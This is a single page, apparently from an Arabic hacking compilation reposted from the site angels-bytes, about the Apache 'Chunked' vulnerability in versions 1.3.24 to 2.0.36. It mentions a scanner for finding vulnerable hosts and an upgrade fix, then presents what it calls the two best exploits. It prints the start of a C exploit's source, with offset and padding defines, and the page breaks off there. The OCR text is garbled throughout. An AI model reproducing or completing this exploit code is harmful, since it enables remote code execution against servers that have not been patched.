Page 291 - بسم الله الرحمن الرحيم

P. 291

‫" ثغرة ‪" Chunked‬‬

‫>منقول من موقع ‪<angels-bytes‬‬

‫كلنا سمع بثغره تصسمى ‪ Chunked‬لـ ‪ ، Apache‬السبب لعد‪.‬م تصحدث موقع ‪ angels-bytes‬عنها هو‬
‫أنها أتصت قبل إنطلق الموقع ‪ ،‬الن سأضع ‪ ، Retina Apache Chunked Scanner‬وهي أداة‬
‫تصقو‪.‬م بفحص نطاق من ‪ 254‬عنوان آي بي ‪ ،‬وتصظهر لك ما منها مصاب بهذه الثغره‪.‬‬

‫إذا أردت معالجة هذه الثغره عند وجهودها فأنصحك بتنزيل أباتصشي ‪ 2.0.39‬فهو الفضل الى الن‬
‫هذه هي وصلة التنزيل‬

‫‪http://www.apache.org/dist/httpd/binaries‬‬

‫أما لمسألة إستثمار هذه الثغره فسوف أضع لكم أفضل أستثمارين‬

‫الخطأ في أباتصشي ‪ 1.3.24‬واعلى إلى ‪ 2‬و من ‪ 2‬إلى ‪ ، dev-2.0.36‬وهي في الروتصين البرمجي الذي‬
‫يتعامل مع رسائل الخطأ‬

‫هذان الستثماران تصستخدمان من قبل مهاجهم بعيد لتسبب طفح محلي في السيرفر المصاب ‪ ،‬مؤديه بذلك إلى‬
‫إعادة كتابه في الذاكرة ‪ ،‬وبطريقة ما تصسمح لتنفيذ كود‬

‫‪ ))*/‬قد تصم تصجريبها وإختتبارها من قبل ‪ angels-bytes.com‬قبل وضعها لكم هنا ((‬
‫*‪/‬‬

‫‪*/‬حصلنا عليها من سيكورتصي تصيم*‪/‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬
‫‪include#‬‬

‫‪define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it#‬‬
‫‪/* failed‬‬

‫‪define RET_ADDR_INC 512#‬‬

‫‪define MEMCPY_s1_OWADDR_DELTA -146#‬‬
‫‪define PADSIZE_1 4#‬‬
‫‪define PADSIZE_2 5#‬‬
‫‪define PADSIZE_3 7#‬‬

‫‪291‬‬

286 287 288 289 290 291 292 293 294 295 296